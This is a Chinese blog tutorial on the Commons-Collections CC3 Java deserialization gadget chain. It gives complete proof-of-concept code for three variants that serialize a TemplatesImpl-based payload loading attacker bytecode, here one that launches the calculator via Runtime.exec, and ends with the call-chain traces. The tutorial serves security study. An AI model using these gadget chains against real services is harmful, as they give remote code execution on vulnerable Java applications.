Commons-Collections篇-CC3链

最新推荐文章于 2025-10-11 23:48:45 发布
原创 最新推荐文章于 2025-10-11 23:48:45 发布 · 1.2k 阅读 · 21 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #代码审计 #反序列化 #java

前言

我们分析前两条链CC1和CC6时,都是利用invoke反射调用的Runtime().getRuntime().exec()来执行命令。而很多时候服务器的代码当中的黑名单会选择禁用Runtime

CC3链主要通过动态加载类加载机制来实现自动执行恶意类代码

1.环境安装

可以接着使用我们之前分析CC1链时安装的环境,具体安装步骤可以看上一篇文章:
Commons-Collections篇-CC1链小白基础分析学习

2.分析

CC3的sink点在于defineClass()

在类的动态加载中,有一种利用ClassLoader#defineClass直接加载字节码的手段

ClassLoader.loadClass()—> ClassLoader.findClass()–>ClassLoader.defineClass()

在这里插入图片描述
defineClass()往往都是protected类型的,作用是处理前面传入的字节码,将其处理称真正的Java类,我们平常使用只能通过反射去调用.
如果只加载恶意类,不初始化的话,是不会执行代码,还需要一个实例化操作

2.1 Templateslmpl类分析

我们寻找谁调用了这个方法,找到了TemplatesImpl类中TransletClassLoader#defineClass,TemplatesImpl类实现了Serializable接口,可以被序列化,但是defineClass方法为默认Default,只能在自己类中使用
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
我们继续find Usages

在这里插入图片描述我们可以看到私有方法defineTransletClasses调用了defineClass(),但是其中有一个if判断,在过程中我们不能让if (_bytecodes == null)判定成功,不然就会抛出错误中断了
在这里插入图片描述
在同类下的getTransletInstance方法中发现了调用,并且还有实例化操作,我们继续寻找
在这里插入图片描述
我们找到了一个公开的方法,接下来开始利用

2.2 Templateslmpl类利用

2.2.1 解决阻碍

在我们之前的分析中,我们能看到有很多的if条件,这些我们都需要提前去满足解决,才能让链正常的执行下去,我们从最上层开始分析限制条件在这里插入图片描述
在这里插入图片描述

  1. _name为String类型,不能为null
TemplatesImpl templates = new TemplatesImpl();
Class ca = templates.getClass();
Field name = ca.getDeclaredField("_name");
name.setAccessible(true);
name.set(templates,"admin");
  1. _class为Class类型的数据,必须为null 默认也是null,不用处理
  2. _bytecodes为字节类型的二维数组,不能为null
Field byteField = ca.getDeclaredField("_bytecodes");
byteField.setAccessible(true);
byte[] evil = Files.readAllBytes(Paths.get("D:\\tools\\idea2023.3\\untitled\\target\\classes\\org\\example\\Calc.class"));
byte[][] codes = {evil};
byteField.set(templates,codes);
  1. _tfactory为一个 TransformerFactoryImpl 类型不可序列化的transient的对象,并且初始化为 null,不能为空,他还需要执行方法
Field tfactory = ca.getDeclaredField("_tfactory");
tfactory.setAccessible(true);
tfactory.set(templates,new TransformerFactoryImpl());

我们编写一个demo进行尝试
先写一个恶意类,并将该文件进行编译为class

public class Calc {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e){
            e.printStackTrace();
        }
    }
}

    public static void main(String[] args) throws Exception {
        TemplatesImpl templates = new TemplatesImpl();
        Class ca = templates.getClass();
        Field name = ca.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"admin");

        Field byteField = ca.getDeclaredField("_bytecodes");
        byteField.setAccessible(true);
        byte[] evil = Files.readAllBytes(Paths.get("D:\\tools\\idea2023.3\\untitled\\src\\main\\java\\org\\example\\Calc.java"));
        byte[][] codes = {evil};
        byteField.set(templates,codes);

        Field tfactory = ca.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());

        templates.newTransformer();
    }

在运行之后会有一个空指针异常的错误
在这里插入图片描述
我们调试并定位到发生错误的代码处,发现_auxClasses是Null
在这里插入图片描述
所以我们现在有两种解决方法:

  1. 设置_auxClasses
  2. 让这个if (superClass.getName().equals(ABSTRACT_TRANSLET))条件判断正确

如果我们设置_auxClasses的值,上面的_transletIndex值为-1,在426行代码进行一次判定,还是会抛出错误
在这里插入图片描述
所以我们选择第二个继续分析,只要让defineClass() 方法中传进去的参数 b 数组的字节码继承了 ABSTRACT_TRANSLET 这个父类,就会判定成功
在这里插入图片描述
我们修改弹计算器的测试代码

package org.example;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class Calc extends AbstractTranslet {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e){
            e.printStackTrace();
        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
        
    }
}

重新运行上面我们的测试代码在这里插入图片描述

2.3 TrAXFilter分析及实例化

我们接着寻找newTransformer()的用法
在这里插入图片描述
在这里插入图片描述
发现在TrAXFilter 中调用了,但是我们也可以看到TrAXFilter没有继承序列化接口,所以不能反序列化

但是CC3的挖掘者发现了一个专门使用反射来动态创建对象的类InstantiateTransformer
在这里插入图片描述
在这里插入图片描述
我们可以使用这个类来实例化TrAXFilter,所以我们第一步先创建一个InstantiateTransformer实例,然后传入TrAXFilter.class

InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},
        new Object[]{templates});
instantiateTransformer.transform(TrAXFilter.class);

在这里插入图片描述
整体POC

public class CC3 {
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates = new TemplatesImpl();
        Class ca = templates.getClass();
        Field name = ca.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"admin");

        Field byteField = ca.getDeclaredField("_bytecodes");
        byteField.setAccessible(true);
        byte[] evil = Files.readAllBytes(Paths.get("D:\\tools\\idea2023.3\\untitled\\target\\classes\\org\\example\\Calc.class"));
        byte[][] codes = {evil};
        byteField.set(templates,codes);

        Field tfactory = ca.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());

//        templates.newTransformer();
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},
                new Object[]{templates});
        instantiateTransformer.transform(TrAXFilter.class);
        //序列化
//        serializable(o);
//        unserializable();
    }

在这里插入图片描述

2.4 CC1+TrAXFilter

我们结合CC1的入口到TrAXFilter的使用,构造POC
注意:在CC1中我们使用恒定转化器 ConstantTransformer 和链式转化器ChainedTransformer 来解决了setValue的值无法控制的问题,我们现在使用中同样要注意使用

package org.example;

import com.oracle.jrockit.jfr.ValueDefinition;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class CC3 {
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates = new TemplatesImpl();
        Class ca = templates.getClass();
        Field name = ca.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"admin");

        Field byteField = ca.getDeclaredField("_bytecodes");
        byteField.setAccessible(true);
        byte[] evil = Files.readAllBytes(Paths.get("D:\\tools\\idea2023.3\\untitled\\target\\classes\\org\\example\\Calc.class"));
        byte[][] codes = {evil};
        byteField.set(templates,codes);

        Field tfactory = ca.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());

//        templates.newTransformer();
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},
                new Object[]{templates});
//        instantiateTransformer.transform(TrAXFilter.class);
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        Map map = new HashMap();
        map.put("id",1);
        Map<Object,Object> transformedMap = TransformedMap.decorate(map,null,chainedTransformer);

        Class<?> aClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor<?> constructor = aClass.getDeclaredConstructor(Class.class, Map.class);
        constructor.setAccessible(true);
        Object o = constructor.newInstance(ValueDefinition.class, transformedMap);

        //序列化
        serializable(o);
        
//        unserializable();
    }
    private static  Object unserializable() throws Exception, IOException, ClassNotFoundException{
        FileInputStream fis = new FileInputStream("obj");
        ObjectInputStream ois = new ObjectInputStream(fis);
        Object o = ois.readObject();
        return o;
    }

    private static void serializable(Object o) throws IOException, ClassNotFoundException{
        FileOutputStream fos = new FileOutputStream("obj");
        ObjectOutputStream os = new ObjectOutputStream(fos);
        os.writeObject(o);
        os.close();

    }
}

用反序列化来执行上面生成的obj文件

public class CC {
    public static void main(String[] args) throws Exception {
        //命令执行代码
        unserializable();
    }

    private static  Object unserializable() throws Exception,IOException, ClassNotFoundException{
        FileInputStream fis = new FileInputStream("obj");
        ObjectInputStream ois = new ObjectInputStream(fis);
        Object o = ois.readObject();
        return o;
    }

}

在这里插入图片描述
路线为

ObjectInputStream.readObject()
    AnnotationInvocationHandler.readObject()
        AbstractInputCheckedMapDecorator$MapEntry.setValue()
            TransformedMap.checkSetValue()
                ChainedTransformer.transform()
                    ConstantTransformer.transform()
                        instantiateTransformer.transform()
                            TrAXFilter.TrAXFilter()
                                TemplatesImpl.newTransformer()
                                    definclass -> newInstance()

2.5 CC1_LazyMap + TrAXFilter

package org.example;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class CC3 {
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates = new TemplatesImpl();
        Class ca = templates.getClass();
        Field name = ca.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"admin");

        Field byteField = ca.getDeclaredField("_bytecodes");
        byteField.setAccessible(true);
        byte[] evil = Files.readAllBytes(Paths.get("D:\\tools\\idea2023.3\\untitled\\target\\classes\\org\\example\\Calc.class"));
        byte[][] codes = {evil};
        byteField.set(templates,codes);

        Field tfactory = ca.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());

//        templates.newTransformer();
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},
                new Object[]{templates});
//        instantiateTransformer.transform(TrAXFilter.class);
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        Map map = new HashMap();
        Map Lazy = LazyMap.decorate(map,chainedTransformer);

        Class a = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor aDe = a.getDeclaredConstructor(Class.class, Map.class);
        aDe.setAccessible(true);
        InvocationHandler invocationHandler = (InvocationHandler) aDe.newInstance(Override.class, Lazy);

        Map proxyMap = (Map) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(),new Class[]{Map.class},invocationHandler);
        invocationHandler =(InvocationHandler) aDe.newInstance(Override.class,proxyMap);

        //序列化
        serializable(invocationHandler);

//        unserializable();
    }
    private static  Object unserializable() throws Exception, IOException, ClassNotFoundException{
        FileInputStream fis = new FileInputStream("obj");
        ObjectInputStream ois = new ObjectInputStream(fis);
        Object o = ois.readObject();
        return o;
    }

    private static void serializable(Object o) throws IOException, ClassNotFoundException{
        FileOutputStream fos = new FileOutputStream("obj");
        ObjectOutputStream os = new ObjectOutputStream(fos);
        os.writeObject(o);
        os.close();

    }
}

在这里插入图片描述
路线为

ObjectInputStream.readObject()
    AnnotationInvocationHandler.readObject()
        AnnotationInvocationHandler.invoke()
            LazyMap.get()
                ChainedTransformer.transform()
                    ConstantTransformer.transform()
                        instantiateTransformer.transform()
                            TrAXFilter.TrAXFilter()
                                TemplatesImpl.newTransformer()
                                    definclass -> newInstance()

2.6 CC6 +TrAXFilter

package org.example;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class CC3 {
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates = new TemplatesImpl();
        Class ca = templates.getClass();
        Field name = ca.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"admin");

        Field byteField = ca.getDeclaredField("_bytecodes");
        byteField.setAccessible(true);
        byte[] evil = Files.readAllBytes(Paths.get("D:\\tools\\idea2023.3\\untitled\\target\\classes\\org\\example\\Calc.class"));
        byte[][] codes = {evil};
        byteField.set(templates,codes);

        Field tfactory = ca.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());

//        templates.newTransformer();
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},
                new Object[]{templates});
//        instantiateTransformer.transform(TrAXFilter.class);
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        Map map = new HashMap();
        Map Lazy = LazyMap.decorate(map,new ConstantTransformer(1));
        TiedMapEntry tied = new TiedMapEntry(Lazy,0);
        HashMap map1 = new HashMap();
        map1.put(tied,1);
        //本地执行put时,会调用 tiedmapTntry.hashcode lazyMap.get("0") 会让lazyMap key不为flase
        Lazy.remove(0);  //remove掉put时 lazyMap里的key 使反序列化时能进入transform
        Class c = LazyMap.class;
        Field factory = c.getDeclaredField("factory");
        factory.setAccessible(true);
        factory.set(Lazy,chainedTransformer);
        serializable(map1);
    }

//        unserializable();
    private static  Object unserializable() throws Exception, IOException, ClassNotFoundException{
        FileInputStream fis = new FileInputStream("obj");
        ObjectInputStream ois = new ObjectInputStream(fis);
        Object o = ois.readObject();
        return o;
    }

    private static void serializable(Object o) throws IOException, ClassNotFoundException{
        FileOutputStream fos = new FileOutputStream("obj");
        ObjectOutputStream os = new ObjectOutputStream(fos);
        os.writeObject(o);
        os.close();

    }
}

在这里插入图片描述
路线为

HashMap.put()
    HashMap.hash()
        TiedMapEntry.hashCode()
        TiedMapEntry.getValue()
            LazyMap.get()
                    ChainedTransformer.transform()
                        instantiateTransformer.transform()
                            TrAXFilter.TrAXFilter()
                                TemplatesImpl.newTransformer()
                                    definclass -> newInstance()

本系列历史文章

反序列化之路-URLDNS

Commons-Collections篇-CC1链小白基础分析学习

CC1链补充-LazyMap

Commons-Collections篇-CC6链分析

commons-collections3(cc3)反序列化分析
遇事不决冲冲冲
03-10 2915
commons-collections3反序列化 cc3cc1想法还是很相似的,然后构造恶意类和调用使用了不同的两个新类 ObjectInputStream.readObject() AnnotationInvocationHandler.readObject() Map(Proxy).entrySet() AnnotationInvocationHandler.invoke()
Commons-Collections3 , Commons-Collections4反序列化 从0开始手写exp
weixin_51458899的博客
04-12 3199
cc3 关于类的动态加载执行恶意代码 java基础知识中我们学到了一些ClassLoader.defineClass加载 其实这里是ClassLoader这个类会递归,最终调用到defineClass [外图片转存失败,源站可能有防盗机制,建议将图片保存下来直接上传(img-6lZu3JAT-1649725376829)(https://raw.githubusercontent.com/hmt38/abcd/main/image-20220411155257616.png)] defineclass
Java反序列化-CC3
每天一小步,进步一大截
04-22 1183
CC3笔记。CC3通过字节码文件,动态类加载来进行命令执行,达到绕过服务器的黑名单的一条
CC3分析与复现
weixin_42974824的博客
08-23 1411
CC3分析与复现
CC3分析
sunyufei_666的博客
08-10 294
这里有个很关键的newInstance,这个就是我们需要实例化的关键方法,但是这个方法是私有方法,这里想要调用defineTransletClasses方法,需要_name不为空值,_class为空值(这个可以不用管),再往上看newTransformer方法。_bytecodes是一个二维字节类型的数组,但是传入defineClass中的_bytecodes是一个一维字节数组,赋值的时候需要赋一个一维字节类型数组,这里可以通过读取class文件,当作一个一维数组赋值给_bytecodes。
[Java反序列化]CommonsCollections3利用学习
Y4tacker的博客
07-25 811
文章目录利用思路 利用思路 绕过了对InvokerTransformer的利用,替代方法是这⾥⽤⼀个新的 Transformer,org.apache.commons.collections.functors.InstantiateTransformer,通过利⽤ InstantiateTransformer来调⽤到TrAXFilter 的构造⽅法,再利 ⽤其构造⽅法⾥的 templates.newTransformer() 调⽤到 TemplatesImpl⾥的字节码 ...
commons-collections4(集合工具库)
最新发布
zp的博客
10-11 1015
Apache Commons Collections4 是 Java 标准集合框架的扩展库,提供了丰富的集合类型和实用工具类。主要新增了 Bag(计数集合)、BidiMap(双向映射)和 MultiValueMap(多值映射)等集合类型,以及 ClosureUtils 等工具类,支持重复执行、条件执行等操作。该库通过 Maven 依赖即可快速集成,版本 4.5.0 提供了线程安全、不可修改、类型转换等包装器类,增强了集合处理能力。
Commons-CollectionsCC1) 反序列化漏洞
blackmagic的博客
08-06 668
Commons-Collections是一个开源的Java集合框架,它提供了一组可重用的集合接口、实现和工具类,以帮助开发人员更方便地操作和处理数据集合。Commons-Collections提供了一些常见集合的实现,包括List、Set、Map等。这些实现类提供了丰富的功能和方法,能够满足不同的使用需求。另外,Commons-Collections还提供了一些特殊的集合类,如BidiMap(双向映射)、MultiMap(多值映射)等,可以更方便地处理一些复杂的数据结构。
Java反序列化Commons-Beanutils1与无 commons-collections的Shiro反序列化利用
weixin_45682070的博客
02-11 1709
Apache Commons Beanutils 首先看一下 Commons Beanutils包,Apache Commons Beanutils 是 Apache Commons 工具集下的另一个项目,它提供了对普通Java类对象(也称为JavaBean)的一些操作方法。 JavaBean可以简单的理解为一个Java类对象。 commons-beanutils中提供了一个静态方法 PropertyUtils.getProperty ,让使用者可以直接调用任意JavaBean的getter方法,看面的de
Javaweb安全——反序列化漏洞-CC3
weixin_43610673的博客
07-06 1103
CommonsCollections3是为了绕过一些规则对InvokerTransformer的限制而产生的,因为在CommonsCollections1中我们为了动态调用方法需要使InvokerTransformer这个类完成回调,被加入黑名单的话就切断了CommonsCollections1的利用。上一文章的TemplatesImpl动态加载字节码刚好就有用武之地了,将原来的回调替换掉变成直接加载字节码。先来看一个demo: 由CommonsCollections1 AnnotationInvoc
Java反序列化-CC3(1)
2401_84969746的博客
05-17 558
前面的CC1与CC6都是通过 Runtime.exec() 进行命令执行的。当服务器的代码将 Runtime放入黑名单的时候就不能使用了。CC3的好处是通过动态加载类的机制实现恶意类代码执行。
java反序列化cc3分析
m0_64815693的博客
05-05 1730
java反序列化cc3分析
Java安全学习笔记--反序列化漏洞利用CC3
m0_64685672的博客
01-19 1441
测试环境 jdk1.7(jdk7u80) Commons Collections3.1 CC3大体上是CC1和CC2的结合,利用核心原理基于CC2的(动态字节码注入恶意类),使用TransformedMap和lazyMap配合cc1的annotationinvocation类触发newTransformer方法,所以CC3不适用jdk1.8。 恶意类 import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun
Java安全 CC3分析
Elite的博客
03-08 1793
cc3的后半部分与cc1相同,都是通过TransformedMap类或LazyMap类触发transform方法,从而触发核心,与cc1不同的是,cc3的核心用到了类在加载初始化时会自动执行静态方法
Java安全反序列化-CC3反序列化漏洞POP分析_ysoserial CommonsCollections3 PoC分析
Ho1aAs‘s Blog
03-11 1110
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. TrAXFilter构造器传入TemplatesImpl会调用newTransformer()2. InstantiateTransformer.transform()调用指定对象的指定类构造器3. LazyMap.get()调用this.factory.transform()构造ChainedTransformer生成lazyMap4. Proxy动态代理+AnnotationInvokerHandler调用LazyMap.get()5. Ann
java反序列化cc3的多种情况
2301_79724395的博客
04-22 903
因为前面以及分析过cc2和TemplatesImpl类加载了,所以这里主要是与前面的知识来进行一个结合我们知道利用TemplatesImpl类的核心就是触发newtransformer方法。
Commons-Collections-CC4分析
鸣蜩十四的博客
06-15 1218
CC4中命令执行点还是一致的,可以用TransformingComparator来代替。
ysoserial CommonsColletions3分析(2)
洋洋的小黑屋
07-08 153
ysoserial CommonsColletions3分析(2) 上文章讲到CC3的TransformedMap,这我们就来讲一下LazyMap。 其实LazyMap还是使用的TemplatesImpl承载payload,InstantiateTransformer、TrAXFilter、ChainedTransformer这三个来构造调用。 和另一条的区别: 主要区别在于调用ChainedTransformer的transform方法是使用LazyMap的get方法触发。反序列化入口还是A
PS F:\datasY> mvn dependency:tree [INFO] Scanning for projects... [INFO] [INFO] ------------------------< cn.com.sandi:datasY >------------------------- [INFO] Building datasY 1.0-SNAPSHOT [INFO] --------------------------------[ war ]--------------------------------- [INFO] [INFO] --- maven-dependency-plugin:2.8:tree (default-cli) @ datasY --- [INFO] cn.com.sandi:datasY:war:1.0-SNAPSHOT [INFO] +- cn.com.sandi:venus:jar:JY1.2:compile [INFO] +- cn.com.sandi:venus-util:jar:JY1.0:compile [INFO] +- cn.com.sandi:venus-cc:jar:JY1.0:compile [INFO] +- net.sf.json-lib:json-lib:jar:jdk15:2.4:compile [INFO] | +- commons-beanutils:commons-beanutils:jar:1.8.0:compile [INFO] | +- commons-collections:commons-collections:jar:3.2.1:compile [INFO] | +- commons-lang:commons-lang:jar:2.5:compile [INFO] | +- commons-logging:commons-logging:jar:1.1.1:compile [INFO] | \- net.sf.ezmorph:e
04-28
[INFO] \- org.apache.commons:commons-math3:jar:3.6.1:compile ``` 2. **过滤关键依赖** 使用 `-Dincludes` 参数缩小范围(支持通配符): ```bash mvn dependency:tree -Dincludes=javax.ws.rs*,org....
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值